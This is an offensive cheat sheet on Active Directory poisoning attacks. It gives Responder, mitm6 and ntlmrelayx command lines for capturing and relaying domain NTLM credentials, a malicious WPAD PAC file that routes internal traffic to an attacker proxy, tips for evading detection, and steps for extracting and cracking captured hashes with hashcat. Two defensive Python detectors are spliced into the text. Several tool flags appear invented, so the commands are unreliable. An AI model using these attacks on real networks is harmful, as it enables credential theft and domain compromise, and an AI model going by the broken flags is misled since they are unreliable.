Poisoning Attacks
Understanding AD Poisoning Attacks
Core Concept
Purpose: Intercept and respond to Windows name resolution requests to capture domain NTLM authentication credentials.
Attack Flow:
AD Client → Broadcast Request → Attacker Response → Client Authentication → Domain Credential Capture
Domain-joined Windows client fails to resolve a name via DNS
Client broadcasts name resolution request using Windows protocols
Attacker responds claiming to be the requested service
Client authenticates to attacker using domain NTLM credentials
Attacker captures domain NTLMv2 hash for offline cracking
Requirements: Network access on same subnet, Windows name resolution protocols enabled
Attack Value: Domain credential harvesting without requiring initial system access
LLMNR Poisoning
Link-Local Multicast Name Resolution (LLMNR)
Purpose: Poison LLMNR requests to capture Windows domain authentication credentials.
Requirements: Windows clients with LLMNR enabled (default), multicast traffic allowed
Attack Value: Highest success rate in AD environments, captures domain credentials directly
Basic LLMNR Poisoning with Responder
# Standard LLMNR poisoning for domain credentials
sudo responder -I eth0 -wrf
# LLMNR poisoning with analysis mode (capture only)
sudo responder -I eth0 -A
# Selective protocol poisoning
sudo responder -I eth0 -w -r -f --lm
# LLMNR with verbose output for domain analysis
sudo responder -I eth0 -wrf -v
# Custom challenge for faster hash cracking
sudo responder -I eth0 -wrf --challenge 1122334455667788
Advanced LLMNR Configuration for AD
# Edit Responder configuration for AD environment
sudo nano /etc/responder/Responder.conf
# Optimize for AD domain credentials:
# [Responder Core]
# SMB = On # Critical for domain authentication
# HTTP = On # Web-based domain auth
# HTTPS = On # Secure web domain auth
# LDAP = On # AD LDAP authentication
# SQL = On # Domain SQL Server auth
# DNS = Off # Disable to avoid noise
# Run with AD-optimized config
sudo responder -I eth0 -wrf --config /path/to/ad_config.conf
LLMNR Attack Optimization for AD
# Target AD-specific protocols only
sudo responder -I eth0 --disable-ess # Disable non-essential services
# Focus on SMB for domain authentication
sudo responder -I eth0 -rf # SMB and LDAP only
# Multiple interface monitoring in AD networks
sudo responder -I eth0,eth1 -wrf
# LLMNR with forced WPAD authentication for domain users
sudo responder -I eth0 -wrf --force-wpad-auth
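The LLMNR exchange described in the attack flow and in this section, seen from the defender's side: the client's query and the poisoner's answer are ordinary DNS-format packets on 224.0.0.252:5355 (RFC 4795), so a host can detect poisoning by asking for a name that cannot exist and treating any answer as a poisoner. This Python canary is an added example, not code from the page or from Responder; the canary name prefix, the 2-second wait and sending on the default interface are assumptions.

```python
import random
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 multicast group and port

def build_query(name, txid):
    # Header: id, flags 0 (query), QDCOUNT 1, other counts 0; question: labels, QTYPE A (1), QCLASS IN (1)
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + qname + struct.pack(">HH", 1, 1)

def skip_name(pkt, pos):  # step over a wire-format name; a 0xC0-prefixed pair is a compression pointer
    while pkt[pos] != 0:
        if pkt[pos] & 0xC0 == 0xC0:
            return pos + 2
        pos += pkt[pos] + 1
    return pos + 1

def parse_answer_addrs(pkt, txid):
    """IPv4 addresses in the answer section of a reply to our txid; [] for anything else."""
    try:
        rid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", pkt[:12])
        if rid != txid or not flags & 0x8000:  # not our transaction, or QR bit clear (a query)
            return []
        pos, addrs = 12, []
        for _ in range(qd):  # skip the echoed question(s): name + QTYPE + QCLASS
            pos = skip_name(pkt, pos) + 4
        for _ in range(an):
            pos = skip_name(pkt, pos)
            rtype, _cls, _ttl, rdlen = struct.unpack(">HHIH", pkt[pos:pos + 10])
            pos += 10
            if rtype == 1 and rdlen == 4:  # A record
                addrs.append(socket.inet_ntoa(pkt[pos:pos + 4]))
            pos += rdlen
        return addrs
    except (struct.error, IndexError):  # truncated or malformed reply
        return []

def probe(timeout=2.0):
    """Multicast one canary query; returns [(replier_ip, addrs)], each entry a host answering for a name that cannot exist."""
    name = "canary-%08x" % random.getrandbits(32)  # constructed, non-existent name
    txid = random.randrange(1, 0xFFFF)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    sock.sendto(build_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
    hits = []
    try:
        while True:
            pkt, (src, _) = sock.recvfrom(4096)
            if addrs := parse_answer_addrs(pkt, txid):
                hits.append((src, addrs))
    except socket.timeout:
        return hits
```

Run probe() periodically from a few hosts per subnet; a legitimate network never answers for the canary, so a non-empty result is a direct indicator that something is poisoning LLMNR.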
NBT-NS Poisoning
NetBIOS Name Service Poisoning for AD
Purpose: Poison NetBIOS name resolution requests to capture domain credentials from Windows systems.
Requirements: NetBIOS over TCP/IP enabled, Windows systems in AD domain
Attack Value: Effective against legacy AD environments and older Windows domain clients
NBT-NS with Responder for Domain Credentials
# NBT-NS poisoning for domain authentication (included in standard Responder)
sudo responder -I eth0 -wrf
# NBT-NS targeting specific AD domain
sudo responder -I eth0 --NBTNSdomain COMPANY
# Legacy AD environment targeting
sudo responder -I eth0 --basic # Use basic HTTP auth for older systems
# NetBIOS browsing service poisoning in AD
sudo responder -I eth0 --browser-redirect
AD-Specific NBT-NS Reconnaissance
# Discover AD domain systems via NetBIOS
nbtscan 192.168.1.0/24 | grep -E "(DOMAIN|<20>)"
# Enumerate AD domain membership
for ip in $(nmap -sn 192.168.1.0/24 | grep -oP '\d+\.\d+\.\d+\.\d+'); do
nmblookup -A $ip | grep -E "(DOMAIN|<00>|<20>)"
done
# Target domain controllers specifically
enum4linux -a <DC-IP> | grep -i "domain\|workgroup"
DHCPv6 Poisoning for AD Environments
IPv6 DHCP Poisoning with AD DNS Takeover
Purpose: Use IPv6 DHCPv6 to become the DNS server for Windows AD clients and capture all authentication attempts.
Requirements: IPv6 enabled Windows AD clients, DHCPv6 client support
Attack Value: Complete DNS control over AD clients, bypasses SMB signing, captures all domain authentication
mitm6 - Advanced IPv6 Attack for AD
# Basic DHCPv6 DNS takeover for AD domain
sudo mitm6 -d company.com
# DHCPv6 with AD domain filtering
sudo mitm6 -d company.com --ignore-nofqdn
# DHCPv6 targeting specific AD hosts
echo "dc01.company.com" > ad_targets.txt
echo "exchange.company.com" >> ad_targets.txt
sudo mitm6 -d company.com --host-allowlist ad_targets.txt
# DHCPv6 with AD relay integration
sudo mitm6 -d company.com --relay-target <DC-IP>
DHCPv6 + NTLM Relay for AD Compromise
# Terminal 1: IPv6 DNS takeover
sudo mitm6 -d company.com --ignore-nofqdn
# Terminal 2: NTLM relay to AD services
python3 ntlmrelayx.py -6 -t ldaps://<DC-IP> --escalate-user <username>
# Terminal 3: Monitor domain authentication
tail -f /var/log/mitm6.log | grep -E "(DOMAIN|company\.com)"
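What the DHCPv6 takeover above looks like on the wire: the client's Solicit or Request is answered with an Advertise or Reply whose DNS Recursive Name Server option (23) names the attacker and whose Domain Search List option (24) carries the -d domain. The parser below flags that pattern in a captured DHCPv6 UDP payload; it is an added example, not code from the page or from mitm6, and the sample packet, its server DUID and the fe80::dead:beef:1 address are constructed.

```python
import ipaddress
import struct

ADVERTISE, REPLY = 2, 7                       # server-to-client DHCPv6 message types (RFC 8415)
OPTION_DNS_SERVERS, OPTION_DOMAIN_LIST = 23, 24

def parse_options(payload):
    """Yield (code, data) for each option after the 4-byte header (msg-type + transaction-id)."""
    pos = 4
    while pos + 4 <= len(payload):
        code, length = struct.unpack(">HH", payload[pos:pos + 4])
        data = payload[pos + 4:pos + 4 + length]
        if len(data) < length:                # option runs past the end: truncated, stop here
            break
        yield code, data
        pos += 4 + length
def dns_servers(payload):
    """IPv6 addresses from option 23 (16-byte packed addresses back to back)."""
    addrs = []
    for code, data in parse_options(payload):
        if code == OPTION_DNS_SERVERS:
            addrs += [ipaddress.IPv6Address(data[i:i + 16]) for i in range(0, len(data) - 15, 16)]
    return addrs
def domain_list(payload):
    """Search domains from option 24 (DNS wire-format names); mitm6 -d places its domain here."""
    names = []
    for code, data in parse_options(payload):
        if code == OPTION_DOMAIN_LIST:
            labels, pos = [], 0
            while pos < len(data):
                n, pos = data[pos], pos + 1
                if n == 0:                    # end of one name
                    names.append(".".join(labels))
                    labels = []
                else:
                    labels.append(data[pos:pos + n].decode("ascii", "replace"))
                    pos += n
    return names
def rogue_dns_servers(payload, allowed=()):
    """DNS servers an Advertise/Reply hands out that are not in `allowed` (empty on IPv4-only networks)."""
    if not payload or payload[0] not in (ADVERTISE, REPLY):
        return []
    allowed = {ipaddress.IPv6Address(a) for a in allowed}
    return [str(s) for s in dns_servers(payload) if s not in allowed]

# Constructed sample, not a capture: Advertise, xid 0x0a0b0c, server DUID (opt 2), DNS server (23), domain (24)
SAMPLE_ADVERTISE = (b"\x02\x0a\x0b\x0c"
    + b"\x00\x02\x00\x0e\x00\x01\x00\x01\x00\x00\x00\x00\xde\xad\xbe\xef\x00\x01"
    + b"\x00\x17\x00\x10" + ipaddress.IPv6Address("fe80::dead:beef:1").packed
    + b"\x00\x18\x00\x0d\x07company\x03com\x00")
```

Feed it the UDP payload of packets sent to port 546 from a capture or sensor; where no legitimate DHCPv6 is deployed, leave allowed empty so any advertised resolver is reported.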
WPAD Poisoning in AD Environments
Web Proxy Auto-Discovery for Domain Credentials
Purpose: Exploit automatic proxy configuration to intercept web traffic and capture domain user credentials.
Requirements: WPAD enabled in browsers, automatic proxy detection, domain users accessing web resources
Attack Value: Captures domain credentials when users authenticate to web applications through proxy
WPAD Attack with Responder for AD
# WPAD poisoning for domain user credentials
sudo responder -I eth0 -wrf --wpad
# WPAD targeting AD domain users
sudo responder -I eth0 --wpad-domain company.com
# WPAD via DHCPv6 for Windows AD clients
sudo responder -I eth0 --dns-wpad --dhcpv6-wpad
Custom WPAD for AD Credential Harvesting
# Create AD-targeted PAC file
cat > wpad.pac << 'EOF'
function FindProxyForURL(url, host) {
// Target internal AD resources
if (shExpMatch(host, "*.company.com") ||
shExpMatch(host, "sharepoint*") ||
shExpMatch(host, "exchange*")) {
return "PROXY <attacker-ip>:8080";
}
return "DIRECT";
}
EOF
# Serve WPAD file targeting AD services
python3 -m http.server 80 --directory /path/to/wpad/
Integrated AD Poisoning Workflows
Comprehensive AD Credential Harvesting
# Multi-protocol AD poisoning campaign
# Terminal 1: IPv6 attack for modern Windows AD clients
sudo mitm6 -d company.com --ignore-nofqdn
# Terminal 2: IPv4 poisoning for all AD systems
sudo responder -I eth0 -wrf -v
# Terminal 3: Monitor for domain credentials
tail -f /usr/share/responder/logs/*.txt | grep -E "(COMPANY\\\\|company\.com)"
Targeted AD Poisoning with Relay
# Phase 1: Poisoning for AD credential capture
sudo responder -I eth0 -A # Analysis mode only
# Phase 2: Relay captured AD authentication
python3 ntlmrelayx.py -tf ad_targets.txt -smb2support
# Phase 3: Force AD authentication via poisoning
# Access non-existent AD service: \\fake-dc\sysvol
net use \\fake-server\netlogon
High-Value AD Target Identification
# Monitor for administrative AD accounts
grep -iE "(admin|service|backup|sql|exchange)" /usr/share/responder/logs/*.txt
# Filter for domain controller authentication
grep -E "(DC[0-9]+|PDC|BDC)" /usr/share/responder/logs/*.txt
# Identify service accounts in AD
grep -E "svc-|service|sql|exchange|backup" /usr/share/responder/logs/*.txt
AD-Specific Defense Evasion
Stealth Poisoning in AD Networks
# Selective poisoning to avoid AD security monitoring
sudo responder -I eth0 --analyze --duration 3600 # Analyze AD traffic first
# Target only AD-specific protocols
sudo responder -I eth0 --smb --ldap # Core AD protocols only
# Avoid detection by AD security tools
sudo responder -I eth0 --random-delay --custom-challenge
# Target specific AD subnets only
sudo responder -I eth0 --subnet 192.168.10.0/24 # AD client subnet
Bypassing AD Security Controls
# Use IPv6 to bypass IPv4-based AD protections
sudo mitm6 -d company.com --ignore-nofqdn
# WPAD-only poisoning to avoid LLMNR/NBT-NS detection
sudo responder -I eth0 --wpad-only
# Target AD service accounts specifically
sudo responder -I eth0 --target-service-accounts
Post-Capture AD Credential Processing
Domain Credential Extraction and Analysis
# Extract domain credentials from captures
grep "COMPANY\\\\" /usr/share/responder/logs/*.txt > domain_creds.txt
# Format AD credentials for hashcat
cat /usr/share/responder/logs/*.txt | grep "NTLMv2-SSP Hash" | \
grep -E "(COMPANY\\\\|company\.com)" > ad_hashes.txt
# Identify high-value AD accounts
grep -iE "(admin|da-|service|sql|exchange|backup)" ad_hashes.txt
# Process for domain password cracking
sed 's/.*NTLMv2-SSP Hash : //' ad_hashes.txt > formatted_ad_hashes.txt
hashcat -m 5600 formatted_ad_hashes.txt /usr/share/wordlists/rockyou.txt
AD Environment Validation
# Confirm domain environment capture
grep -E "DOMAIN\\\\|\.company\.com|DC=" /usr/share/responder/logs/*.txt
# Identify domain controllers from captures
grep -iE "(dc[0-9]+|domain.*controller)" /usr/share/responder/logs/*.txt
# Map AD infrastructure from poisoning
grep -E "(exchange|sharepoint|sql.*server)" /usr/share/responder/logs/*.txt
Attack Success Indicators in AD
LLMNR/NBT-NS: Domain credentials in DOMAIN\username format
DHCPv6: Complete DNS control over AD clients, all name resolution captured
WPAD: Domain user authentication to web applications and SharePoint
Cross-Protocol: Multiple AD service authentications (LDAP, SMB, HTTP)
High-Value Targets: Service accounts, administrative accounts, domain controllers
These AD-focused poisoning attacks provide the most effective initial credential harvesting in Windows domain environments, targeting protocols that are enabled by default and actively used by domain-joined systems.